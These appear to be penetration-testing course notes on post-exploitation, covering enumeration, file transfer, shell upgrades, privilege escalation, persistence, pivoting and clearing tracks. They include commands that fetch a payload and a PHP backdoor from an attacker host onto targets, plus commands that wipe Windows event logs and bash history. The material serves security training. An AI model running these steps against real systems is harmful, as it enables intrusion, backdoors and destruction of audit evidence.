- Basic familiarity with Linux & Windows
- Basic understanding of TCP & UDP protocols
- Basic familiarity with Metasploit and Exploitation
- Perform post exploitation
- Perform Win/Linux local enumeration
- Upgrade shells and elevate privileges
- Establish persistence and dump account hashes
- Pivot to other systems and clear tracks
subscription required
Post-Exploitation Introduction
ποΈ Post-Exploitation is the final phase of interaction with a target during a pentest. Using various attacking techniques, the pentester determines the value of the compromised system and keeps control of it for future usage, depending on the kind of access and the stealthiness he must have.
It is what the pentester does after the initial foothold and the techniques depends on the target characteristics (operating system, infrastructure).
- The techniques must follow the Rules of Engagement agreed upon with the client before the penetration test, based on the company infrastructure and services.
βNecessary permissions are required to conduct post-exploitation techniques like modifying services, system configuration, logs deletion, perform privilege escalation.
- Local Enumeration
- Transferring Files
- Upgrading Shells
- Privilege Escalation
- Persistence
- Dumping & Cracking Hashes
- Pivoting
- Clearing Tracks
The post-exploitation process repeats itself after pivoting to another new target.
π¬ The following techniques are covered in the
ππ Checklist - Local Windows Privilege Escalation | HackTricks
What is running on the target system?
- Hostname
- OS Name, Build, Service Pack, Architecture
- Installed updates/Hotfixes
- Current user, privileges & additional user information
- Other users
- Groups
- Members of the built-in administrators group
- IP address & network adapter
- Internal networks and other hosts on the network
- TCP/UDP services + ports
- Routing table
- Windows Firewall state
- Running processes & services
- Scheduled tasks
A process is an istance of a running program.
A service is a process that runs in the background.
The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules.
- Be time efficient
- Additional enumeration & exploitation information
Tools:
ππ Checklist - Linux Privilege Escalation | HackTricks
- Hostname
- Distribution & release version
- Kernel version & Architecture
- CPU information
- Disk & mounted drives
- Installed packages
- Current user & privileges
- Other users
- Groups
- IP address & network adapter
- Internal networks and other hosts on the network
- TCP/UDP services + ports
- Running services
- Scheduled Cron Jobs
The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules. It is very useful to be time efficient.
Tools:
Python modules can be useful for setting up a web server that hosts the files required for transfer. These modules
- Check
Pythonversion
python -V
python3 -V
py -v # on WindowsSimpleHTTPServer-python2module
# If Python version returned is 2.X
python -m SimpleHTTPServer <PORT_NUMBER>http.server-python3module
# If Python version is 3.X
python3 -m http.server <PORT># On Windows, try
python -m http.server <PORT>
py -3 -m http.server <PORT>e.g.
- Copy a file into the current directory and setup the web server to download the file into the target system
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.7
python3 -m http.server 80- Files can be downloaded from a browser or using a
GETrequest
- Set up a web server to host the
payload.exefile
# Attacker machine
cd /root/Desktop/ # payload.exe must be here
python3 -m http.server 80- After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the
certutiltool incmd.
# Windows Target machine
cd C:\Temp
certutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe- After exploiting the Linux target, transfer the
php-backdoor.phpfile to the target. - 2 terminal sessions are necessary - use
tmuxutility to get more sessions.
tmux - is a program, terminal multiplexer, which runs in a terminal and allows multiple other terminal programs to be run inside it
sudo apt install tmux -y# Attacker machine
tmux
# ... Exploitation with MSFconsole in Terminal 0 ...
# CTRL+B and then C to open a new terminal session
cd /usr/share/webshells/php/
ip -br -c a
192.219.50.2
python3 -m http.server 80# CTRL+B then 0 (zero) to navigate to the first Terminal session
# Target machine
/bin/bash -i
wget http://192.219.50.2/php-backdoor.php
π¬ Interactive shells techniques are covered in an INE vulnerable Lab. Commands are below, assuming the target SAMBA service is already exploited through the
exploit/linux/samba/is_known_pipenameMSF module.
- After the exploitation (using
MSFconsole,netcat, etc), a non-interactive shell is obtained since it doesn't provide with a prompt- This is a command shell session
- Display the list of shells on the target system
cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/bin/bash -i
/bin/sh -i
Spawn TTY Shells
- Upgrade to a simple
bashorshsession (assumingbashis installed on the target system)
/bin/bash -i
/bin/sh -i
SHELL=/bin/bash script -q /dev/null
# Setup environment variables
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=/bin/bash- From the non-interactive shell session, check
Pythonversion (if present)
python --version
Python 2.7.9- Spawn a
bashsession withPython. Specified shell must be listed inside/etc/shells
python -c 'import pty; pty.spawn("/bin/bash")'Fully Interactive TTY
- Background (
CTRL+Z) the current remote shell - Update the local terminal line settings with
sttyand bring the remote shell back withfg
stty raw -echo && fg- Reinitialize the terminal with
reset
resetπ For more information on Full TTY Shells check
perl -h- Spawn a
bashsession withPerl.
perl -e 'exec "/bin/bash";'Privilege Escalation vulnerabilities can be identified by using various automation scripts and tools, based on the target system configuration.
- PrivescCheck - a PowerShell script to enumerate common Windows configuration issues that can be leveraged for local privilege escalation
# From CMD
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML"π¬ Check
Privesc vulnerabilities can be identified automatically using the LinEnum tool.
- The below labs will focus on manual Linux Privilege Escalation techniques, instead
- Linux file Permissions are important
π¬ Check
Windows Persistence
ποΈ Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. - MITRE ATT&CK
β Persistence techniques and methods usually require administrative access and must follow the rules of engagement agree with the customer.
π¬ Check the Windows Persistence Labs
Linux Server SSH service is typically enabled and an attacker can take advantage of it.
- If password login is disabled and key-based authentication is enabled, the attacker can copy a user's
SSHprivate key and use it for future access.
Linux Cron is a service that repeatedly runs Cron jobs that can be used for command execution at a fixed interval and ensure persistent access to the target system.
π¬ Check the Linux Persistence Labs
π Check the already covered Credential Dumping theory here:
After the dumping process, hashes can be cracked using:
π¬ Check the Cracking Hashes Labs here
ποΈ Pivoting is a post exploitation technique of using a compromised host, a foothold / plant, to attack other systems on its private internal network.
- Once gained access to the first target host, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.
ποΈ Port Forwarding consists of rerouting/redirecting traffic from a target system's particular port to an attacker system's specific port.
- The service will be remotely available to the attacker system
π¬ Check the Pivoting Lab here
According to the rules of engagement, the pentester may be required to clear any changes that have been made to the target systems as a result of the exploitation and post-exploitation stages.
A good practice is to store all artifacts payloads, scripts and binaries in these folders:
- Windows -
C:\Temp - Linux -
/tmp
Metasploit Framework generates and stores a lot of artifacts on the target. Some modules provides removal resource scripts.
- Delete the Windows Event Log can be a good post-exploitation clearing technique.
- β Avoid it during a regular Penetration Test, because data inside the Win Event Log is important to the customer.
Metasploit e.g.
cd C:\\
mkdir Temp
cd Temp
# Upload exploit into this C:\Temp directory
- Use the
Cleanup RC File
# Cleanup Meterpreter RC File:
cat /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.0454/ATTACKDEFENSE_20230429.0454.rc
background
sessions 1
resource /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.1019/ATTACKDEFENSE_20230429.1019.rc
# Clear Windows Event Log from the Meterpreter session
# An attacker could potentially do this
clearevcd /tmp
# Upload exploit into this /tmp directorybashhistory logs the activity and the used commands- To clear the
bash history
history -c
~/.bash_historyfile content can be deleted too
cat /dev/null > ~/.bash_history
- When using Metasploit Framework exploits, proceed manually to clear artifacts from the
/tmpdirectory or other used directories.